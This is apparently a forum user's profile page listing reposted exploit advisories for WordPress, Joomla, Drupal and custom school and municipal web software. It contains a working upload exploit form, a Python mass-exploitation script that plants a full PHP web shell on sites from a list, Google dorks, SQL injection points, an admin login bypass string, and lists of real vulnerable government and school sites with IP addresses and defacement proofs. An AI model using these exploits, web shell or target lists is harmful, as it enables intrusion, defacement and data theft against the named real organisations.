
mohammad_ghazei

Section moderator
  • Posts: 532
  • Points: 2,559
  • Joined:
  • Last visited:
  • Days won: 2

mohammad_ghazei last won the day on 12 Mehr

mohammad_ghazei is one of the record holders for the most liked posts!

2 followers

About mohammad_ghazei

  • Rank: ██████▒▒▒▒ 53%

User details

  • Gender: Male
  • Location: Gaza

Recent profile visitors

265 profile visitors
  1. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> [img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png] Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png] # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png] # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. 
# Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 [img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png] ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  2. # Exploit Title : Joomla Codextrous Com_B2jcontact Component Shell Upload Vulnerability Auto Exploiter Python # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/06/2018 # Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html ~ extensions.joomla.org/extension/b2j-contact/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Description : B2J Contact is one of the most popular extension of Codextrous which is used for create Contact forms. This revolutionary, multi-functional Joomla! contact form component is super easy-to-install, that brings you the ultimate in User Experience with its clean design and user friendly backend. You can create as many contact forms as you want. You can create a contact form and to display it you create its menu as well. B2J Contact component comes with a module also, by which you can display contact form where ever you want. B2J Contact has got the following main options which users may customize: Basic Option - Default Fields - Dynamic Fields - Events - Security Each section on its own opens up great custom options/fields for you to play with to get your contact form up and running smoothly. Despite its enormous functionality, B2J Contact Component is extremely lightweight with an amazing design. Whether you are making an online survey or simply creating another contact form, B2J Contact Component is there to help you! B2J Contact comes with all the below mentioned key features and more: Joomla! 
3.0 Support - In-buit Form Builder - Access to extension support system - All features shown on the Demo ################################################################################################# # Google Dorks : inurl:''/index.php?option=com_b2jcontact'' inurl:''/components/com_b2jcontact/'' intext:''Another Great Website by One Spot Media.'' intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License. Font Awesome font licensed under SIL OFL 1.1.'' intext:''POWERED BY VISUALPROJECT WEB'' intext:''© 2013-2014 Opentec SRL, tutti i diritti riservati.'' intext:''honlap: rosko.hu'' +There are more dorks. Use your brain to find more. # Exploit : /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah # Error displaying on the page [ Error Language changes according to the country ] : {"error":"File is empty."} {"error":"No files were uploaded."} {"error":"null."} {"error":"Keine Dateien hochgeladen."} # Uploaded File Path : /components/com_b2jcontact/..... # Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions. # Use Auto Exploiter Tool for this Vulnerability. 
################################################################################################# # Auto Exploitation Tool Python => import requests as r import argparse as arg import os, sys import urllib2,urllib,re from multiprocessing import Pool from multiprocessing.dummy import Pool as ThreadPool from urlparse import urlparse import random, string #Coded By KingSkrupellos #Cyberizm Digital Security Team def wibu(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) shell = """ <?php function fUUPd($NVAR) { $NVAR=gzinflate(base64_decode($NVAR)); for($i=0;$i<strlen($NVAR);$i++) { $NVAR[$i] = chr(ord($NVAR[$i])-1); } return $NVAR; <?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title> CyBeRizM Dosya Yöneticisi Sh3LL </title> <center><img src="http://i.hizliresim.com/3vnXyj.gif"></center> <style> body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: silver; } #content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; } table{ border: 1px #000000 dotted; } H1{ font-family: "Rye", cursive; } a{ color: #000; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <H1><center> Cyberizm.Org / KingSkrupellos </center></H1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Nerde miyim? 
: '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Dosya Yüklendi</font><br />'; }else{ echo '<font color="red">Dosya Yüklenemedi</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Dosya Yükle : <input type="file" name="file" /> <input type="submit" value="Yükle" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Tamamdır!</font><br />'; }else{ echo '<font color="red">Malesef!</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" 
size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Kaydedildi</font><br />'; }else{ echo '<font color="red">Malesef</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Silindi.</font><br />'; }else{ echo '<font color="red">Silinemedi.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Dosya Adı</center></td> <td><center>Boyut</center></td> <td><center>İzinler</center></td> <td><center>Ayarlar</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' 
|| $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin Yeri </option> <option value=\"rename\">Adı Değiştir</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' 
KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin</option> <option value=\"rename\">Adı Değiştir</option> <option value=\"edit\">Düzenle</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<br />Only belongs to KingSkrupellos </font>, Recoded By <font color="red">KingSkrupellos / Cyberizm.Org |</font><br />Bilgi: <font color="red">http://www.cyberizm.org/</font> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 
'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>""" def Fox_Contact(url): if url[-1] != "/": url = site + "/" if url[:7] != "http://" and url[:8] != "https://": url = "http://" + url return url user_agent = {'User-agent': 'Mozilla/5.0'} try : Filelist = open(sys.argv[1], 'r').readlines() for i in Filelist: try: url=i.strip() urlpa = urlparse(url) site = urlpa.netloc site=Fox_Contact(url) print "[#]Url:"+site req = urllib2.Request(url) opreq = urllib2.urlopen(req).read() b2jcomids = re.findall('<a name="b2jcomid_(.*?)"></a>',opreq) print "[+]Exploiting b2jcomid" for b2jcomid in b2jcomids: b2jcomid=str(b2jcomid) print "[#]b2jcomid:"+b2jcomid halah = str("common.php") b0x_dir = [("index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah)] diretorios=0 for diretorio in b0x_dir: diretorios += 1 url_vuln = site + diretorio shell_dir = site + "/components/com_b2jcontact/"+halah+"?ina" checa_site = r.get(url_vuln, headers=user_agent) if '{"' in checa_site.text: print( "\n[!] exploiting in {}...".format(diretorios)) envia_shell = r.post(url_vuln, data=shell, headers=user_agent) verifica_shell = r.get(shell_dir, headers=user_agent) if "Cwd:" in verifica_shell.text: a = open('Attacker.txt','a') a.write(shell_dir+'\n') print( "\n[*]Good 1 ") print( "[+] deface dir "+shell_dir) else: print("shell Upload *_* : ", shell_dir) else: print("\n[-] Fuck Sites : {}.".format(diretorios)) except Exception as ex : print "[#]Fuck Site !~! 
" pool = ThreadPool(10) pool.map(Fox_Contact, Filelist) pool.close() pool.join() except : print "[+] You not inputing list file" ################################################################################################# CVE Details => cvedetails.com/vulnerability-list/vendor_id-16496/product_id-37996/Codextrous-B2j-Contact.html CVE-2017-9030 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a directory traversal attack that bypasses a uniqid protection mechanism, and makes it easier to read arbitrary uploaded files. CVE-2017-5215 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a rename attack that bypasses a "safe file extension" protection mechanism, leading to remote code execution. CVE-2017-5214 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows prediction of a uniqid value based on knowledge of a time value. This makes it easier to read arbitrary uploaded files. ################################################################################################# Another Exploiter Tool Python Coded [ If another exploit don't work - use this - Only Shell Code Changed ] ghostbin.com/paste/psoza - archive.is/sDumw ################################################################################################# # Example Sites : garrhotel.com/welcome/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en nuovaestetica.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah masthamnsoperan.se/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah raiffeisen-schwaben-allgaeu.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah 
+ Proof of Concept for the Vulnerability : archive.is/rjRKz ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team # Original Reference Link => cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html #################################################################################################
  3. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : argentina.gob.ar/paisdigital # Tested On : Windows # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060021 ################################################################################################# # Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar # Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar # Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar # Exploit : /?q=contacto # Path : /sites/default/files/webform/.... # Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx. ################################################################################################# # Target IP Address => 186.33.254.182 # Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS pellegrini.gov.ar magdalena.gob.ar marull.gob.ar pampablanca.gob.ar municipalidaddeabrapampa.gob.ar saladillo.gob.ar lasflores.gob.ar municipalidaddearrayanal.gob.ar palmasola.gob.ar frailepintado.gob.ar rinconada.gob.ar montedelosgauchos.gob.ar trescruces.gob.ar generallavalle.gob.ar vinalito.gob.ar puestoviejo.gob.ar balcarce.gob.ar ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  4. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/06/2018 # Vendor Homepage : regione.toscana.it - jquery.com # Tested On : Windows # Version : 7 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060240 ################################################################################################# # Google Dorks : intext:''Scrivi al Comune'' site:fi.it Il testo del tuo messaggio * site:fi.it # Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19 # Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/..... # Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx. # Don't forget to put www. before comune. on the URL Address bar. ################################################################################################# # Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH www.comune.vicchio.fi.it/segnalazioni-e-reclami-0 www.comunebarberino.it/scrivi-al-comune www.comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0 www.comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0 www.comune.rignano-sullarno.fi.it/scrivi-al-comune www.comune.pontassieve.fi.it/scrivi-al-comune-0 www.comune.marradi.fi.it/scrivi-al-comune www.comune.dicomano.fi.it/scrivi-al-comune-0 www.comune.reggello.fi.it/scrivi-al-comune-0 www.comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune www.comune.scarperiaesanpiero.fi.it/scrivi-al-comune www.comune.provagliodiseo.bs.it/node/19 www.comune.terni.it/scrivi-al-comune ################################################################################################ Reference Topic Link [ It belongs to me ] => 
cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  5. # Exploit Title : Developed by Desh Universal (Pvt.) Limited Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Vendor Homepage : deshuniversal.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090018 ################################################################################################# # Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.'' # Exploits : /teacher?page=[SQL Injection] /all-teacher-view?dept_id=[SQL Injection] /achievement-events?eventid=[SQL Injection] /text-file?file_id=[SQL Injection] /teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection] /event-details?events-id=[SQL Injection] /notice-details?nid=[SQL Injection] /messages?messageid=[SQL Injection] /text-file?file_id=[SQL Injection] /details?id=[SQL Injection] /details?cat-id=[SQL Injection] /program-subjects?programID=[SQL Injection] /video-details?vid=[SQL Injection] # Admin Control Panel Path => /login It redirects to another links for login with username and pass. 
################################################################################################# # Example Vulnerable Sites => 1) rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4 2) acps.edu.bd/messages?mid=101%27 3) cpscm.edu.bd/details?id=5%27 4) dcc.edu.bd/notice-details?nid=666%27 5) dcgpsc.edu.bd/details?id=14%27 6) sagc.edu.bd/details-photo?albumID=5%27 7) bbcpsc.edu.bd/details?id=12%27 8) gpcpsc.edu.bd/achievement_details?content_id=16%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  6. ################################################################################################# # Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/07/2018 # Vendor Homepages : copotronic.com ~ shikkhangon.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] # CXSecurity : cxsecurity.com/ascii/WLB-2018070067 ################################################################################################# # Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions ################################################################################################# # Google Dorks : intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.'' intext:''© Copotronic InfoSystems Limited. 
All Right Reserved.'' inurl:''/about_college/'' site:edu.bd Copotronic # Admin Control Panel Path => /admin /login # Exploit : Username : '=''or' Password : '=''or' # Useable Administration Control Panel URL Links => /web/principal_message /web/notice /web/notice_list /web/form_add /web/form_list /web/information_list /web/slide /web/about /web/picture_gallery /web/catagory_list /admin/teacher_registration /admin/teacher_list /academic/class_teacher_assign /admin/teacher_salary_structure /admin/staff_registration /admin/staff_list /admin/student_registration /admin/student_list /admin/class_wise_student_list /admin/section_wise_student_list /admin/student_subject_assign /admin/student_subject_view /fees/fees_cat /fees/class_wise_fees_management /fees/student_fees_generate /web/slide# /academic/set_ca_marks /academic/create_tabulation_sheet /academic/marit_list /academic/marit_list_class /academic/mark_sheet /academic/transcript /academic/tabulation_sheet /academic/tabulation_sheet_subject_wise /academic/result_view /accounts/master_head_create /accounts/master_head_list /accounts/sub1_head_create /accounts/sub1_head_list /accounts/sub2_head_create /accounts/sub2_head_list /accounts/sub3_head_create /accounts/sub3_head_list /accounts/navigation_head_view /accounts/debit_voucher_entry /accounts/debit_voucher_list /accounts/credit_voucher_entry /accounts/credit_voucher_list /web/book_category_list /web/book_list /admin/student_sms_notice /admin/attendance /academic/show_class_routine /academic/show_exam_routine /admin/institute_information /admin/class_list /web/class_assign /academic/set_class_timing /academic/class_routine /admin/section_list /admin/section_assign /admin/session_list /admin/shift_list /admin/subject_list /admin/subject_assign /academic/gpa_system /academic/mark_distribution_system /academic/term_subject_list /academic/subject_wise_total_marks_list /academic/set_exam_time /academic/set_admit_card_initial /academic/term_list /admin/chartof_accounts 
/admin/weekly_holiday /admin/shift_assign Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png .jpg .jpeg .gif ################################################################################################# # Example Sites and Target Vulnerable IP Address 144.217.239.135 => 1) gachuaadarshahs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE 2) dbmrhs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => archive.is/JhaLN Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/ 3) gnamhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/hgFkL 4) uttararesidentialcollege.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/1DOxK 5) prbsc1930.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/qCvp3 6) sandwipidealhs.edu.bd => [ Proof of Concept for the Vulnerability ] =>archive.is/CHF7H 7) kadhurkhilhighschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ipG78 7) kalapaniahs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/5Mv84 8) alhelalsat.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ZyP4d 9) kapasgolaschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/pUGuF 10) mhabhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/WxjIg 11) psidm.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/lw9D0 12) bgka.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/95DZt ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  7. #################################################################################################
# Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/06/2018
# Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com
+ dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr
+ cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net
# Tested On : Windows and Linux
# Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-200 [ Information Exposure ]
An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
+ CWE-399 [ Resource Management Errors ]
+ CWE-211 [ Information Exposure Through Externally-Generated Error Message ]
+ CWE-532 [ Information Exposure Through Log Files ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-199 [ Information Management Errors ]
#################################################################################################
# Description : Every forum needs a decent editor, and with TinyMCE you get just that. Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience. This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre-supplied with all editing essentials such as ‘bold’, ‘blockquote’, ‘spoiler’, ‘link’, ‘image’ and more. Settings allow you all the control you should need including the essential option of rejecting posts with embedded formatting.
# Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png
# Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png
# According to the OWASP Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.
# Risk Factor : The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilities to steal configuration files regarding the web application or the rest of the operating system.
For Example :
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
In combination with, say, unprotected use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files.
The source code of index.php:
<?php echo file_get_contents(getcwd().$_GET['page']); ?>
An attacker crafts a URL like so:
http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php
with the knowledge of the FPD in combination with Relative Path Traversal
<?php
//Hidden configuration file containing database credentials.
$hostname = 'localhost';
$username = 'root';
$password = 'owasp_fpd';
$database = 'example_site';
$connector = mysql_connect($hostname, $username, $password);
mysql_select_db($database, $connector);
?>
Disregarding the above sample, FPD can also be used to reveal the underlying operating system by observing the file paths.
Windows, for instance, always starts with a drive letter, e.g. C:\, while Unix-based operating systems tend to start with a single forward slash.
*NIX:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2
Microsoft Windows:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2
The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames.
